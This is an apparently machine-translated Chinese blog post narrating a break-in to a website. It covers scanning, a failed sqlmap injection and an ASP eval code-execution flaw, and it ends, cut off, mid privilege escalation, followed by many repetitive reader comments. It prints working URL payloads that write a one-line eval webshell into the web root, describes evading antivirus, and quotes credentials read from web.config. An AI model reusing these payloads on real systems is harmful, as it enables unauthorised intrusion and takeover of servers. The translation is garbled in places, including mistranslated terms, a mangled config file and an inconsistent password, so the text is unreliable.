1. 扫描
我还打开NETSPARKER 3.2.10版本对网站WEB端和Cyf的后台路径进行狂扫。从这两个软件来看,我们也知道我使用的工具有多老了,而且它们应该与我的年龄相匹配,就像KTV里不同年龄段的人唱不同的歌曲一样(分别见图1和图2)。
图1
图2
从图2可以看到,我很幸运,漏洞很多,包括注入、XSS,还有一个罕见的代码执行漏洞,尤其是ASP代码执行更是罕见。
2、WEB渗透
1.我以为一个SQLMAP就可以处理所有事情。但往往你越期待,它就越令你失望。 SQLMAP 猜测的PAYLOAD 包括基于错误的、堆叠的查询、AND/OR 基于时间的盲查询和UNION 查询。可以说,脱裤子的技术会让你眼花缭乱,但最后在猜场值的时候却是SB。我太激动了。 SQLMAP,你能告诉我这个吗?后来我把这台服务器拿下来,发现SQLMAP无法对字段值做任何事情的原因可能是表名前后没有方括号。只需将用户更改为[用户]即可。当然,这是我的猜测。我常常不去追究所取得的成果一波三折的原因。我作为一个人不能太好。另外,背景还没有扫出来,所以我们暂时放弃了注入路径。
2. 尝试在某处执行远程代码。按照图2中的提示手动运行。结果如图3所示。
target.com/target.asp?err_code=%2bresponse.write(1)
图3
看到eval,我就知道这个网站的程序员是个聪明人。至少在我写程序的时候,几乎没有使用过这么高级的功能。当然,我曾经写过asp木马如一句话。但需要注意的是,图3中的提示是Object required: 'eval(.)',与ASP提示的server.Object required: 'eval(.)'不同。我们来测试一下其他提交参数。先获取物理路径,哈哈,还有回声,如图4。
target.com/target.asp?err_code=%2bresponse.write(server.mappath('/'))
图4
只需编写一个文件并提交代码:
%2bresponse.write(server.CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\inetpub\wwwroot\upload\5.asp",8,True,0).WriteLine("%eval(request(Chr(35) )))%'))
事情并不总是一帆风顺。在这段自命不凡的代码之前我已经失败过好几次了。一是我把路径改成了c:\inetpub\wwwroot\upload,确保自己有写权限(感谢上图1的后台路径猜测器),二是5.asp。你会猜到我之前已经调整过代码编写了。我通过了1、2、3、4,但还是失败了。我抽了几根烟,结合之前的错误结果,我明白错误在哪里了。首先图3表示Object required,其次我写的%eval(request(Chr(35)))%没有转义%,所以最终安装B成功的代码是:
%2bresponse.write(CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\inetpub\wwwroot\upload\5.asp",8,True,0).WriteLine("%25eval(request(Chr(35))) )%25'))。
大家可以仔细比较这两行代码的区别。这个网站的程序员真的很奇怪。他把asp写成vbs。至此,webshell就获得了,如图5。
图5
3. 权限提升
服务器是win2003 sp2、vmware虚拟机,几乎没有打本地提权补丁。这应该是各种功勋大显身手的好机会。不幸的是,服务器上安装了单机版的Symantec和网络版的Trend。我的漏洞在上传时就被杀死了,根本无法运行。此外,两人还联手封锁了目录C:\Documents and Settings\All Users\Documents\中外部程序的操作。不过没关系,还有一个目录C:\Documents and Settings\All Users\Application Data\VMware\Installer\可以执行外部命令。读取网站的虚拟目录和匿名帐户密码。也许有些网站管理员偷懒(图6),将密码设置为相同的密码,或者有些黑客已经在这里并将某些帐户添加到管理组中。但还是不行,这种方式被屏蔽了,图6的密码是随机密码。
图6
等一下,网站根目录下的web.config写的是什么?
?xml 版本='1.0'?
配置
系统.web
添加值='index.asp'/
身份模拟='true'用户名='备份'密码='y111118m3'/
customErrors 模式='关闭'/
/系统.web
/配置
备份的是管理员帐户!命令行运行net use \\127.0.0.1\ipc$ y1l11118m3 /u:system\backup测试是否准确,出现2242错误。用net helpmsg 2242检查后发现该用户的密码已经过期。这个过期的管理员账户有什么用呢? net用户备份,如图8所示。
用户评论
黑盒渗透真是刺激!全程心跳都没停过。
有9位网友表示赞同!
感觉这黑盒渗透手法很新颖啊,有点眼界开阔了
有16位网友表示赞同!
分享一下具体的手法和工具吗?很想学习一下
有18位网友表示赞同!
一次非常有趣的黑盒渗透 这种挑战性很高吧?
有19位网友表示赞同!
想知道最终效果怎么样?成功了吗?
有6位网友表示赞同!
黑盒渗透真的很考验技术水平,佩服高手!
有9位网友表示赞同!
这篇文章看得我热血沸腾!我也想去尝试黑盒渗透。
有18位网友表示赞同!
黑盒测试确实是一个非常实际的安全评估方式啊
有12位网友表示赞同!
很有意思,希望能看到更多关于黑盒渗透的分享
有10位网友表示赞同!
这种挑战性高的活动,让人感觉自己也在参与其中!
有16位网友表示赞同!
想知道他们在黑盒渗透过程中遇到哪些困难?
有11位网友表示赞同!
期待看到详细案例分析,深入了解黑盒渗透方法
有12位网友表示赞同!
黑盒渗透的体验一定特别刺激吧?!
有6位网友表示赞同!
这个文章写的很棒,让我对黑盒渗透有了更深的理解!
有19位网友表示赞同!
黑盒渗透是信息安全领域的重要组成部分啊
有19位网友表示赞同!
非常期待后续更多关于黑盒渗透的分享 细节越多越好!
有20位网友表示赞同!
这篇文章让我意识到黑盒渗透的强大性和重要性。
有5位网友表示赞同!
学习黑盒渗透需要哪些资源?能否推荐一些教材或课程?
有13位网友表示赞同!
第一次知道黑盒渗透,感觉很有意思呀!
有20位网友表示赞同!